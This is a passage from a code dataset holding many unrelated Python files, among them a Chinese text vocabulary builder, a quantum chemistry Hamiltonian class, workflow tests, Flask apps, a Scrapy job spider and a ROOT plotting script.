fname, 'w') as file:\n\t\t\tfile.write('\\n'.join(text).encode('utf-8'))\n","sub_path":"fabfile.py","file_name":"fabfile.py","file_ext":"py","file_size_in_byte":498,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"60651763","text":"import collections\nimport jieba\nfrom pathlib import Path\n\nfrom utils import yaml_utils\n\nvocabulary_size = 5000\ndataset_name = 'wiki_corpus' # wiki_corpus\noutput_dir = Path('../dataset').absolute()\n\n\ndef read_data(path):\n data_path = Path(path)\n raw_word_list = list()\n total = 1\n with data_path.open(mode='r', encoding='UTF-8') as f:\n line = f.readline()\n while line:\n line = f.readline()\n total += 1\n print('\\r 当前第{}行'.format(total), end='')\n with data_path.open(mode='r', encoding='UTF-8') as f:\n line = f.readline()\n i = 1\n while line:\n while '\\n' in line:\n line = line.replace('\\n', '')\n while ' ' in line:\n line = line.replace(' ', '')\n if len(line) > 0:\n raw_words = list(jieba.cut(line, cut_all=False))\n raw_word_list.extend(raw_words)\n print('\\r >>当前读取到{}/{}行'.format(i, total), end='')\n line = f.readline()\n i += 1\n return raw_word_list\n\n\n# Step 2: Build the dictionary and replace rare words with UNK token.\ndef build_dataset(words):\n print('统计字符出现的数量')\n count = [('UNK', -1)]\n count.extend(collections.Counter(words).most_common(vocabulary_size - 1))\n print('创建词典')\n dictionary = dict()\n for word, _ in count:\n dictionary[word] = len(dictionary)\n print('根据词典转化原数据成序列')\n data = list()\n unk_count = 0\n for word in words:\n if word in dictionary:\n index = dictionary[word]\n else:\n index = 0 # dictionary['UNK']\n unk_count += 1\n data.append(index)\n count[0] = ('UNK', unk_count)\n print('制作反向查询词典')\n reverse_dictionary = dict(zip(dictionary.values(), dictionary.keys()))\n output_path = output_dir / dataset_name\n print('导出文件')\n yaml_utils.write(output_path / 'data.yaml', data)\n yaml_utils.write(output_path / 'reverse_dictionary.yaml', reverse_dictionary)\n with (output_path / 'dictionary.tsv').open(mode='w', encoding='UTF-8') as file:\n for i in range(vocabulary_size):\n file.write(reverse_dictionary[i] + '\\n')\n info_dict = {'vocabulary_size': vocabulary_size, 'data': str(output_path / 'data.yaml'),\n 'dictionary': str(output_path / 'dictionary.tsv'),\n 'reverse_dictionary': str(output_path / 'reverse_dictionary.yaml')}\n yaml_utils.write(output_path / 'info.yaml', info_dict)\n print('导出完成')\n\n\nif __name__ == '__main__':\n words = read_data('../data/{}.txt'.format(dataset_name))\n build_dataset(words)\n","sub_path":"scripts/build_ch_dataset.py","file_name":"build_ch_dataset.py","file_ext":"py","file_size_in_byte":2706,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"99269194","text":"from PIL import Image ,ImageDraw,ImageFont\r\n\r\n\r\nim = Image.open('test.png')\r\ndraw = ImageDraw.Draw(im)\r\nprint (im.format,im.size,im.mode)\r\nfont = ImageFont.truetype(\"consola.ttf\", 40, encoding=\"unic\")#设置字体\r\ndraw.text((700, 50), u'99', 'red', font)\r\n \r\nim.show()\r\n\r\n","sub_path":"0000.py","file_name":"0000.py","file_ext":"py","file_size_in_byte":273,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"556768177","text":"import numpy as np\nimport copy as cp\n\nclass Hamiltonian:\n# {{{\n def __init__(self):\n self.t = np.array([]) # 1e electrons (with frozen core contributions\n self.V = np.array([]) # 2e electrons\n self.e_nuc = 0\n self.e_core = 
0\n self.C = np.array([]) # MO coeffs defining the basis for H \n self.S = np.array([]) # Overlap integrals defining the basis for H \n self.C_core = np.array([]) # MO coeffs defining the frozen core \n\n def transform_orbs(self,U):\n \"\"\"\n Rotate orbitals by a unitary transformation matrix, U\n U(old_basis, new_basis)\n \"\"\"\n assert(len(U.shape)==2)\n self.C = self.C.dot(U)\n self.t = U.T.dot(self.t).dot(U)\n \n '''\n self.V = np.einsum(\"pqrs,pt,qu,rv,sw->tuvw\",self.V,U,U,U,U)\n '''\n self.V = np.tensordot(self.V, U, axes=(0,0))\n self.V = np.tensordot(self.V, U, axes=(0,0))\n self.V = np.tensordot(self.V, U, axes=(0,0))\n self.V = np.tensordot(self.V, U, axes=(0,0))\n\n return\n\n def transform_to_new_mos(self,C_new):\n \"\"\"\n Transform the hamiltonian to the new mo basis, C_new\n \"\"\"\n assert(C_new.shape[0] <= self.C.shape[0])\n assert(C_new.shape[1] <= self.C.shape[1])\n \n # Get transformation matrix\n U = self.C.T.dot(self.S).dot(C_new)\n self.transform_orbs(U)\n \n return U\n\n def extract_Hamiltonian(self,orb_subset):\n \"\"\"\n Project Hamiltonian onto a given orbital subset and return Hamiltonian object\n\n i.e., \n orb_subset = [4,6,8,9]\n \"\"\"\n assert(len(orb_subset) <= self.t.shape[0])\n \n H = Hamiltonian()\n H.e_nuc = cp.deepcopy(self.e_nuc)\n H.e_core = cp.deepcopy(self.e_core)\n H.S = cp.deepcopy(self.S)\n H.C_core = cp.deepcopy(self.C_core)\n \n H.C = self.C[:,orb_subset]\n H.t = self.t[orb_subset,:][:,orb_subset]\n #H.V = self.V[:,:,:,orb_subset][:,:,orb_subset,:][:,orb_subset,:,:][orb_subset,:,:,:]\n H.V = self.V[orb_subset,:,:,:][:,orb_subset,:,:][:,:,orb_subset,:][:,:,:,orb_subset]\n \n return H\n\n def reorder_orbitals(self,orb_order):\n \"\"\"\n Reorder Hamiltonian \n \"\"\"\n assert(len(orb_order) <= self.t.shape[0])\n \n self.C = self.C[:,orb_order]\n self.t = self.t[orb_order,:][:,orb_order]\n #self.V = self.V[:,:,:,orb_order][:,:,orb_order,:][:,orb_order,:,:][orb_order,:,:,:]\n self.V = self.V[orb_order,:,:,:][:,orb_order,:,:][:,:,orb_order,:][:,:,:,orb_order]\n return \n\n def get_C(self):\n if(self.C.shape[0] != self.C_core.shape[0]):\n print(\"ERROR: self.C.shape[0] != self.C_core.shape[0])\")\n exit(-1)\n return np.hstack((self.C_core,self.C))\n \n def nbf(self):\n return self.C.shape[0]\n def nmo(self):\n return self.C.shape[1]\n \n def get_eri_1122(self,ob1,ob2):\n \"\"\"\n Return 2e integrals corresponding to (pq|rs)\n where pq in ss1\n and rs in ss2\n \"\"\"\n ss1 = ob1.orbs\n ss2 = ob2.orbs\n return self.V[ss1,:,:,:][:,ss1,:,:][:,:,ss2,:][:,:,:,ss2]\n\n def get_eri(self,ob1,ob2,ob3,ob4):\n \"\"\"\n Return 2e integrals corresponding to (pq|rs)\n where pq in ss1\n and rs in ss2\n \"\"\"\n ss1 = ob1.orbs\n ss2 = ob2.orbs\n ss3 = ob3.orbs\n ss4 = ob4.orbs\n return self.V[ss1,:,:,:][:,ss2,:,:][:,:,ss3,:][:,:,:,ss4]\n\n def compute_determinant_energy(self,str_a,str_b):\n \"\"\"\n For a given alpha and beta string, compute and return the energy\n \"\"\"\n E = self.e_nuc + self.e_core\n \n for i in str_a:\n E += self.t[i,i]\n for j in str_a:\n if i = Gamma^{IJ}_pq where both \n # p and q are alpha\n # self.tdms[\"cca_aab\"] = = Gamma_cca_aab^{IJ}_pqr where both \n # p and q are alpha and r is\n # beta - only non-zero if I\n # and J have different numbers\n # of alpha beta electrons\n\n # NYI:\n\n #\n # still to convert to ab initio ....\n self.Spi = {} # matrix_rep of i'th S^+ in local basis\n self.Smi = {} # matrix_rep of i'th S^- in local basis\n self.Szi = {} # matrix_rep of i'th S^z in local basis\n\n # in tucker basis\n self.Ham = 
np.array([]) # Hamiltonian on block sublattice\n self.S2 = np.array([]) # S2 on block sublattice\n self.Sz = np.array([]) # Sz on block sublattice\n\n # in configuration basis\n self.full_H = np.array([]) # Hamiltonian on block sublattice\n self.full_S2 = np.array([]) # S2 on block sublattice\n self.full_Sz = np.array([]) # Sz on block sublattice\n\n self.diis_vecs = np.array([]) \n \n def init(self,_index,_orbs,_ss):\n \"\"\"\n _index = index of block\n _sites = list of lattice sites contained in block\n _ss = list of dimensions of vectors per subspace, -1 indicates all remaining states\n \"\"\"\n self.index = _index\n self.orbs = _orbs\n for si in range(0,self.n_orbs()):\n self.full_dim *= 4\n \n vec_count = 0\n for ss in _ss:\n # if we have asked for orthog compliment\n if ss == -1:\n self.ss_dims.append(self.full_dim - vec_count)\n vec_count = self.full_dim\n else:\n self.ss_dims.append(ss)\n vec_count += ss\n if (self.full_dim-vec_count) < 0:\n print(\"Problem setting block dimensions\", self)\n exit(-1)\n self.ss_dims.append(self.full_dim-vec_count)\n return \n \n def n_orbs(self):\n return len(self.orbs)\n\n def fill_H(self,Hfull):\n self.H = Hfull.extract_Hamiltonian(self.orbs)\n \n def __str__(self):\n out = \" Block %-4i:\" %(self.index)\n for si in range(0,self.n_orbs()):\n if si < self.n_orbs()-1:\n out += \"%5i,\" %(self.orbs[si])\n else:\n out += \"%5i\" %(self.orbs[si])\n out += \" : \" + str(self.ss_dims)\n return out\n\n# }}}\n\n\nclass Molecule:\n# {{{\n def __init__(self):\n self.na = 0\n self.nb = 0\n self.n_mo = 0\n self.n_bf = 0\n self.ftc = [] # function_to_center\n self.n_atom = 0\n\n def function_to_center(self,i):\n \"\"\"\n The atomic center for the i'th function\n \"\"\"\n assert(len(self.ftc) == self.n_bf)\n return self.ftc[i]\n\n# }}}\n\n\n","sub_path":"save/lib/Hamiltonian.py","file_name":"Hamiltonian.py","file_ext":"py","file_size_in_byte":8508,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"298374577","text":"from __future__ import with_statement, print_function\n'''\n@author: laure.hugo@cea.fr\n@author: Soizic Laguitton\n@organization: U{IFR 49}\n@license: U{CeCILL version 2}\n'''\n\nimport unittest\nimport sys\nimport os\nimport shutil\nimport tempfile\nimport socket\n\nfrom soma_workflow.client import WorkflowController\nfrom soma_workflow.configuration import Configuration, LIGHT_MODE\nfrom soma_workflow.test.utils import get_user_id\nfrom soma_workflow.test.utils import suppress_stdout\n\nfrom soma_workflow.test.workflow_tests import WorkflowExamplesLocal\nfrom soma_workflow.test.workflow_tests import WorkflowExamplesShared\nfrom soma_workflow.test.workflow_tests import WorkflowExamplesSharedTransfer\nfrom soma_workflow.test.workflow_tests import WorkflowExamplesTransfer\n\n\nclass WorkflowTest(unittest.TestCase):\n\n LOCAL_PATH = \"local path\"\n FILE_TRANSFER = \"file transfer\"\n SHARED_RESOURCE_PATH = \"shared resource path\"\n SHARED_TRANSFER = \"file transfer and shared resource path\"\n\n wf_ctrl = None\n path_management = None\n wf_examples = None\n wf_id = None\n\n @classmethod\n def setup_wf_controller(cls, workflow_controller):\n cls.wf_ctrl = workflow_controller\n\n @classmethod\n def setup_path_management(cls, path_management):\n '''\n * path_management: LOCAL_PATH, FILE_TRANSFER or SHARED_RESOURCE_PATH\n '''\n cls.path_management = path_management\n\n def setUp(self):\n if self.path_management == self.LOCAL_PATH:\n workflow_examples = WorkflowExamplesLocal()\n elif 
self.path_management == self.FILE_TRANSFER:\n workflow_examples = WorkflowExamplesTransfer()\n elif self.path_management == self.SHARED_RESOURCE_PATH:\n workflow_examples = WorkflowExamplesShared()\n elif self.path_management == self.SHARED_TRANSFER:\n workflow_examples = WorkflowExamplesSharedTransfer()\n self.wf_examples = workflow_examples\n\n def tearDown(self):\n if self.wf_id:\n self.__class__.wf_ctrl.delete_workflow(self.wf_id)\n if os.path.isdir(self.wf_examples.output_dir):\n shutil.rmtree(self.wf_examples.output_dir)\n\n @classmethod\n def run_test(cls, debug=False, interactive=False, **kwargs):\n sys.stdout.write(\"********* soma-workflow tests: WORKFLOW *********\\n\")\n\n config_file_path = Configuration.search_config_path()\n # sys.stdout.write(\"Configuration file: \" + config_file_path + \"\\n\")\n resource_ids = Configuration.get_configured_resources(config_file_path)\n\n for resource_id in resource_ids:\n sys.stdout.write(\"============ Resource : \" + resource_id +\n \" =================== \\n\")\n config = Configuration.load_from_file(resource_id,\n config_file_path)\n if not interactive and config.get_mode() != LIGHT_MODE:\n sys.stdout.write('Resource %s is not tested in '\n 'non-interactive mode\\n' % resource_id)\n continue # skip login/password ask\n if interactive:\n sys.stdout.write(\"Do you want to test the resource \"\n \"%s (Y/n) ? \" % resource_id)\n sys.stdout.flush()\n test_resource = sys.stdin.readline()\n if test_resource.strip() in ['no', 'n', 'N', 'No', 'NO']:\n # Skip the resource\n sys.stdout.write('Resource %s is not tested \\n'\n % resource_id)\n sys.stdout.flush()\n continue\n (login, password) = get_user_id(resource_id, config)\n\n if config.get_mode() == LIGHT_MODE:\n # use a temporary sqlite database in soma-workflow to avoid\n # concurrent access problems\n tmpdb = tempfile.mkstemp('.db', prefix='swf_')\n os.close(tmpdb[0])\n os.unlink(tmpdb[1])\n # and so on for transfers / stdio files directory\n tmptrans = tempfile.mkdtemp(prefix='swf_')\n config._database_file = tmpdb[1]\n config._transfered_file_dir = tmptrans\n\n try:\n\n with suppress_stdout(debug):\n wf_controller = WorkflowController(resource_id,\n login,\n password,\n config=config)\n cls.setup_wf_controller(wf_controller)\n\n allowed_config = cls.allowed_config[:]\n for configuration in cls.allowed_config:\n if config.get_mode() != configuration[0]:\n allowed_config.remove(configuration)\n if len(allowed_config) == 0:\n sys.stdout.write(\n \"No tests available for the resource %s \\n\"\n % resource_id)\n\n for configuration in allowed_config:\n (mode, file_system) = configuration\n sys.stdout.write(\n \"\\n---------------------------------------\\n\")\n sys.stdout.write(\"Mode : \" + mode + '\\n')\n sys.stdout.write(\"File system : \" + file_system + '\\n')\n cls.setup_path_management(file_system)\n\n if file_system in (cls.SHARED_RESOURCE_PATH,\n cls.SHARED_TRANSFER) \\\n and not config.get_path_translation():\n sys.stdout.write(\n \"Paths translation unavailable - not testing \"\n \"this case\\n\")\n sys.stdout.flush()\n continue\n\n suite_list = []\n list_tests = []\n for test in dir(cls):\n prefix = \"test_\"\n if len(test) < len(prefix):\n continue\n if test[0: len(prefix)] == prefix:\n list_tests.append(test)\n\n suite_list.append(unittest.TestSuite(map(cls,\n list_tests)))\n alltests = unittest.TestSuite(suite_list)\n with suppress_stdout(debug):\n res = unittest.TextTestRunner(verbosity=2).run(\n alltests)\n sys.stdout.flush()\n\n if len(res.errors) != 0 or len(res.failures) 
!= 0:\n                        raise RuntimeError(\"tests failed.\")\n\n            finally:\n                if config.get_mode() == LIGHT_MODE:\n                    if not kwargs.get('keep_temporary', False):\n                        os.unlink(config._database_file)\n                        shutil.rmtree(config._transfered_file_dir)\n                    else:\n                        print('temporary files kept:')\n                        print('database file:', config._database_file)\n                        print('transfers:', config._transfered_file_dir)\n\n    @staticmethod\n    def print_help(argv):\n        print(argv[0],\n              '[-h|--help] [--interactive] [--keep-temporary] [--debug]')\n\n    @staticmethod\n    def parse_args(argv):\n        kwargs = {}\n        if len(argv) > 1:\n            if '-h' in argv[1:] or '--help' in argv[1:]:\n                WorkflowTest.print_help(argv)\n                sys.exit(0)\n            if '--interactive' in argv[1:]:\n                kwargs['interactive'] = True\n            if '--keep-temporary' in argv[1:]:\n                kwargs['keep_temporary'] = True\n            if '--debug' in argv[1:]:\n                kwargs['debug'] = True\n            else:\n                kwargs['debug'] = False\n        return kwargs\n\n    def print_job_io_info(self, job_id, msg=None, file=sys.stderr):\n        # this debug info should be removed when we find\n        # out why tests randomly fail from time to time.\n        (jobs_info, transfers_info, workflow_status, workflow_queue,\n         tmp_files) = self.wf_ctrl.workflow_elements_status(self.wf_id)\n        job_list = self.wf_ctrl.jobs([job_id])\n        job_name, job_command, job_submission_date = job_list[job_id]\n\n        print('\\n** failure in %s job stdout/stderr **'\n              % self.__class__.__name__, file=file)\n        print('job id:', job_id, ', job name:', job_name, file=file)\n        if msg:\n            print('++ error message: ++', file=file)\n            print(msg, file=file)\n            print('++ (message end) ++', file=file)\n        eng_stdout, eng_stderr = \\\n            self.wf_ctrl._engine_proxy.stdouterr_file_path(job_id)\n        print('job engine stdout:', eng_stdout, ', stderr:', eng_stderr,\n              file=file)\n        print('++ stdout: ++', file=file)\n        print(open(eng_stdout).read(), file=file)\n        print('++ (stdout end) ++', file=file)\n        print('++ stderr: ++', file=file)\n        print(open(eng_stderr).read(), file=file)\n        print('++ (stderr end) ++', file=file)\n        jobs_files = [\n            (ji[0],\n             self.wf_ctrl._engine_proxy.stdouterr_file_path(ji[0]))\n            for ji in jobs_info]\n        print('engine jobs files:', jobs_files, file=file)\n        print('jobs list:', job_list, file=file)\n        print('tmp_files:', tmp_files, file=file)\n        print('** (job failure end) **', file=file)\n\n    def assertTrue(self, condition, msg=None):\n        if not bool(condition) and hasattr(self, 'tested_job'):\n            self.print_job_io_info(self.tested_job, msg)\n        return super(WorkflowTest, self).assertTrue(condition, msg)\n\n    def assertFalse(self, condition, msg=None):\n        if bool(condition) and hasattr(self, 'tested_job'):\n            self.print_job_io_info(self.tested_job, msg)\n        return super(WorkflowTest, self).assertFalse(condition, msg)\n\n    def assertEqual(self, first, second, msg=None):\n        if first != second and hasattr(self, 'tested_job'):\n            self.print_job_io_info(self.tested_job, msg)\n        return super(WorkflowTest, self).assertEqual(first, second, msg)\n\n    def assertNotEqual(self, first, second, msg=None):\n        if first == second and hasattr(self, 'tested_job'):\n            self.print_job_io_info(self.tested_job, msg)\n        return super(WorkflowTest, self).assertNotEqual(first, second, msg)\n\n","sub_path":"python/soma_workflow/test/workflow_tests/workflow_test.py","file_name":"workflow_test.py","file_ext":"py","file_size_in_byte":10634,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"}
+{"seq_id":"75555323","text":"print('json-序列化')\n\nimport json\n\n# JSON serialization\ndic = {'name':'clp','age':18}\nprint(dic)\nf = 
open('E:\python_text\jsontext','w')\nf.write(json.dumps(dic))\nf.close()\n# shorthand: the one-liner below is equivalent to the two lines above\n#json.dump(dic,f)\n\n# deserialize json\nf = open('E:\python_text\jsontext','r')\ndata = f.read()\nf.close()\ndata = json.loads(data)\nprint(data)\n\n\nimport shelve\n# edit the dict stored in the shelf\nf = shelve.open('E:\python_text\shelve_text')\nf['info'] = {'name':'clp','age':18}\nf['ccc'] =['1,2,3,4']\n# read back\ndata = f.get('info')\ndata1 = f.get('ccc')\nprint(data,data1)\n\n# aside\ndic = {'name':'clp','age':18}\ndata = dic.get('name','没有哦') # look up a dict value by key name; returns the value if the key exists, otherwise the given default\nprint(data)","sub_path":"json-demo_9_3.py","file_name":"json-demo_9_3.py","file_ext":"py","file_size_in_byte":735,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"}
+{"seq_id":"307095886","text":"import ChemicsWS # The import will instantiate the WS\nfrom flask import Flask, url_for\nimport logging\nimport os\n\n\n#DEBUGMODE = True\nDEBUGMODE = False\nDEBUGLOGFILE = \"DebugLogFile.txt\"\nPORT = 8081 \n#PORT = 80 \n#PORT = 22 \n\n\nif not DEBUGMODE:\n    ChemicsWS.app.debug = False\n    threadMode = True\nelse:\n    ChemicsWS.app.debug = True\n    threadMode = False\n\nif not DEBUGMODE:\n    logSid = logging.StreamHandler()\n    logSid.setLevel(logging.WARNING)\n    logSid.setFormatter(logging.Formatter('%(asctime)s %(levelname)s: %(message)s ' '[in %(pathname)s:%(lineno)d]'))\n    ChemicsWS.app.logger.addHandler(logSid)\nelse:\n    logFid = logging.FileHandler(DEBUGLOGFILE, \"w\") \n    #logFid.setLevel(logging.WARNING)\n    logFid.setLevel(logging.INFO)\n    logFid.setFormatter(logging.Formatter('%(asctime)s %(levelname)s: %(message)s ' '[in %(pathname)s:%(lineno)d]'))\n    ChemicsWS.app.logger.addHandler(logFid)\n    ChemicsWS.app.logger.warning('Initializing the log file')\n\n# Start the WS\nChemicsWS.app.run(host='0.0.0.0', port=PORT, threaded=threadMode, use_reloader=False)\n","sub_path":"ChemicsWS/ChemicsWS/startChemics_iLab.py","file_name":"startChemics_iLab.py","file_ext":"py","file_size_in_byte":1065,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"}
+{"seq_id":"207913910","text":"## Write a program that asks for two integers and prints their sum\n\nsomar=True\nwhile somar !=False:\n    x= int(input(\"informe o primeiro número para ser somado: \\n\"))\n    y= int(input(\"informe o segundo número para ser somado: \\n\"))\n    print(\"A soma dos dois números é: %d \" % (x+y))\n\n\n    # loop control\n    pergunta=input(\"Deseja fazer nova soma: \\n\")\n    if pergunta==\"sim\":\n        somar=True\n    else:\n        somar=False\n\n","sub_path":"lista_1_questão_1.py","file_name":"lista_1_questão_1.py","file_ext":"py","file_size_in_byte":462,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"}
+{"seq_id":"521573773","text":"# Getting input to determine if numbers are even or odd\ndef user_input_eve_or_odd():\n    number = int(input('Give me a number and I will tell you if it is even or odd? '))\n    check_if_even_or_odd = number % 2\n\n    if check_if_even_or_odd == 0:\n        print(f\"{number} is Even\")\n    else:\n        print(f\"{number} is Odd\")\nuser_input_eve_or_odd()\n\n# Is 'Number' a multiple of 4\ndef is_number_multiple_of_4():\n    number = int(input('Give me a number and I will tell you if it is a multiple of 4... 
'))\n \n if number % 4 == 0: \n print(f\"Yes, {number} is a multiple of 4\")\n else:\n print(f\"No, {number} is not a multiple of 4\")\n\nis_number_multiple_of_4()\n\n# Does 'Num' divide evenly into 'Check'\ndef is_it_divisible():\n num = int(input('Give me a number to be divided... '))\n check = int(input(f\"Give me a number that {num} will be divided by... \"))\n \n if num % check == 0:\n print(f\"The numbers {num} and {check} are Evenly Divisible\")\n else:\n print(f\"The numbers {num} and {check} are Not Evenly Divisible\")\n\nis_it_divisible()\n","sub_path":"week2/evenOrOdd/evenOrOdd.py","file_name":"evenOrOdd.py","file_ext":"py","file_size_in_byte":1078,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"456557135","text":"from __future__ import absolute_import\nfrom __future__ import division, print_function, unicode_literals\nfrom flask import Flask, request, jsonify,render_template\n\nfrom sumy.parsers.html import HtmlParser\nfrom sumy.parsers.plaintext import PlaintextParser\nfrom sumy.nlp.tokenizers import Tokenizer\nfrom sumy.summarizers.lsa import LsaSummarizer as Summarizer\nfrom sumy.nlp.stemmers import Stemmer\nfrom sumy.utils import get_stop_words\n\nimport nltk\nimport ssl\n\ntry:\n _create_unverified_https_context = ssl._create_unverified_context\nexcept AttributeError:\n pass\nelse:\n ssl._create_default_https_context = _create_unverified_https_context\n\nnltk.download('stopwords')\nnltk.download('punkt')\n\nLANGUAGE = \"english\"\nSENTENCES_COUNT = 10\n\napp = Flask(__name__)\n\n@app.route('/')\ndef homepage():\n return render_template('index.html')\n\n\n@app.route('/api/summarize', methods=['POST'])\ndef summarize():\n \"\"\" Returns summary of articles \"\"\"\n if request.method == 'POST':\n url = request.form['pageurl']\n parser = HtmlParser.from_url(url, Tokenizer(LANGUAGE))\n stemmer = Stemmer(LANGUAGE)\n\n summarizer = Summarizer(stemmer)\n summarizer.stop_words = get_stop_words(LANGUAGE)\n\n final = []\n\n for sentence in summarizer(parser.document, SENTENCES_COUNT):\n final.append(str(sentence))\n return render_template('result.html', len=len(final), summary=final)\n\nif __name__ == '__main__':\n app.run(debug=True, host='127.0.0.1', port=5000)","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1500,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"79861447","text":"# -*- coding: utf-8 -*-\n\"\"\"This file is a Weban spider created on top of the ATSSpider\nscrapy crawl weban -a url=\"http://weban.jp/webapp/gen/search/prefectureSearch/result?A3=1308&CMD=300&FID=275&V1=21&Z1=029&A1=03&V25=1&Z2=140044\" -a mining_job_id=999 -a iteration=1 -a extract=1\nsample url:\n http://weban.jp/webapp/gen/search/prefectureSearch/result?A3=1307&CMD=300&FID=275&V1=21&Z1=029&A1=03&V25=1&Z2=140044\n\"\"\"\nfrom re import compile\n\nfrom scrapy.http import Request\nfrom scrapy.selector import Selector\n\nfrom brightcorp.base.atsspiders import ATSSpider\nfrom brightcorp.items import BrightcorpItemLoader\nfrom brightcorp.processors import Prefix, HtmlFormatter\n\n\nclass Weban(ATSSpider):\n\n name = \"weban\"\n ref_re = compile(\"/(\\d+)\\.\")\n download_delay = 10\n\n def parse(self, response):\n sel = Selector(response)\n jobs = sel.xpath(\"//div[@class='shopSummaryTypeA01']\")\n for job in jobs:\n job_link = job.xpath(\".//p[@class='catch']/a/@href\").extract()\n if job_link:\n meta = {\n 'title': job.xpath(\n \".//p[@class='catch']/a/text()\"\n 
).extract(),\n 'company': job.xpath(\n \".//h2[@class='heading']/a/text()\"\n ).extract(),\n }\n yield Request(\n job_link[0], meta=meta, callback=self.parse_job_callback()\n )\n\n next_page = sel.xpath(\"//li[@class='paging_next']/a/@href\").extract()\n if next_page:\n yield Request(\n url=next_page[0], callback=self.parse\n )\n\n def parse_job(self, response):\n\n loader = BrightcorpItemLoader(response=response)\n loader.add_value('url', response.url)\n loader.add_value('title', response.meta['title'])\n loader.add_value('company', response.meta['company'])\n loader.add_value(\n \"referencenumber\", response.url, Prefix(\"%s-\" % self.name),\n re=self.ref_re\n )\n loader.add_xpath(\n \"description\",\n \"//div[@class='columnTypeC01']/div[@class='column']/table\",\n HtmlFormatter()\n )\n yield loader.load_item()\n","sub_path":"brightcorp/brightcorp/spiders/weban.py","file_name":"weban.py","file_ext":"py","file_size_in_byte":2268,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"233968223","text":"import _mssql\r\nimport uuid\r\nimport decimal\r\nimport pymssql\r\nfrom openpyxl import *\r\nfrom common.sql import con\r\n\r\nsites=[x.value for x in load_workbook(\"siteList.xlsx\").worksheets[0].columns[0]]\r\nwb=Workbook()\r\nU3G=wb.create_sheet(index=0, title=\"U3G\")\r\nU2G=wb.create_sheet(index=0, title=\"U2G\")\r\nG3G=wb.create_sheet(index=0, title=\"G3G\")\r\nG2G=wb.create_sheet(index=0, title=\"G2G\")\r\ncon=con()\r\nfor site in sites:\r\n query=\"\"\"SELECT *\r\n FROM [o].[h_G2GNCELL]\r\n WHERE CELLNAME LIKE '%%%s_'\r\n \"\"\"%str(site).zfill(4)\r\n cur=con.cursor()\r\n cur.execute(query)\r\n result=cur.fetchall()\r\n G2G.append([x[0] for x in cur.description])\r\n for x in result:\r\n G2G.append(x)\r\n cur.close() \r\n \r\n query=\"\"\"SELECT *\r\n FROM [o].[h_G3GNCELL]\r\n WHERE CELLNAME LIKE '%%%s_'\r\n \"\"\"%str(site).zfill(4)\r\n cur=con.cursor()\r\n cur.execute(query)\r\n result=cur.fetchall()\r\n G3G.append([x[0] for x in cur.description]) \r\n for x in result:\r\n G3G.append(x)\r\n cur.close()\r\n \r\n query=\"\"\"SELECT *\r\n FROM [o].[h_U2GNCELL]\r\n WHERE CELLNAME LIKE '%%%s0__'\r\n \"\"\"%str(site).zfill(5)\r\n cur=con.cursor()\r\n cur.execute(query)\r\n result=cur.fetchall()\r\n U2G.append([x[0] for x in cur.description]) \r\n for x in result:\r\n U2G.append(x)\r\n cur.close()\r\n\r\n query=\"\"\"SELECT *\r\n FROM [o].[h_U3GNCELL]\r\n WHERE CELLNAME LIKE '%%%s0__'\r\n \"\"\"%str(site).zfill(5)\r\n cur=con.cursor()\r\n cur.execute(query)\r\n result=cur.fetchall()\r\n U3G.append([x[0] for x in cur.description]) \r\n for x in result:\r\n U3G.append(x)\r\n cur.close() \r\n \r\nwb.save(\"1.xlsx\") \r\n \r\n \r\n \r\n","sub_path":"miscellaneous/lsNbrRnpBySite.py","file_name":"lsNbrRnpBySite.py","file_ext":"py","file_size_in_byte":1913,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"493143488","text":"#https://blog.csdn.net/haodawei123/article/details/90517274\nimport random\nimport numpy as np\nimport matplotlib.pyplot as plt\nnp.set_printoptions(precision=4, suppress=True)\nfreq = random.randint(0,10)\nt = np.arange(-10*np.pi, 10*np.pi, 0.1*np.pi)\n# ft = 10*np.sin(t)\nft = 10*np.cos(freq*t)\nfi = np.fft.ifft(ft)\nfr = np.fft.fft(fi)\n\nprint('ft=', ft)\nprint('fr=', fr)\nprint('fi=', fi)\n\n\nprint('freq=', freq)\n\nplt.plot(t,ft,label=\"$y = 10 sin(f x)$\", color=\"red\", linewidth=2)\nplt.plot(t,fi,label=\"ifft: y$\", color=\"blue\", 
linewidth=2)\nplt.plot(t,fr,label=\"fr: y$\", color=\"white\", linewidth=1)\nplt.show()\n","sub_path":"homework/W10/4/4.py","file_name":"4.py","file_ext":"py","file_size_in_byte":602,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"227349111","text":"\n\n###########################################\n# Plot Maker for quick plots in Zll channel\n#\n# by David Curry\n#\n# 2.25.2015\n###########################################\n\nimport sys\nimport os\nimport re\nimport fileinput\nimport subprocess\nimport numpy as np\nfrom decimal import *\nfrom ROOT import *\nfrom ROOT import gROOT\nfrom matplotlib import interactive\n\nfile = TFile('/exports/uftrig01a/dcurry/heppy/files/prep_out/v23_7_18_ZH125.root')\ntree = file.Get('tree')\n\nfile_ttbar = TFile('/exports/uftrig01a/dcurry/heppy/files/prep_out/v23_7_18_Zuu.root')\ntree_ttbar = file_ttbar.Get('tree')\n\ncut = 'Vtype > -1 & Vtype < 2 & Jet_pt[hJCidx[0]] > 20. & Jet_pt[hJCidx[1]] > 20. & abs(Jet_eta[hJCidx[0]]) < 2.4 & abs(Jet_eta[hJCidx[1]]) < 2.4'\n\ndata_cut = cut + ' & (HLT_BIT_HLT_IsoMu20_v || HLT_BIT_HLT_IsoTkMu20_v)'\n\n# Djet Mass\nc1 = TCanvas('c1')\ns1 = THStack('s1', 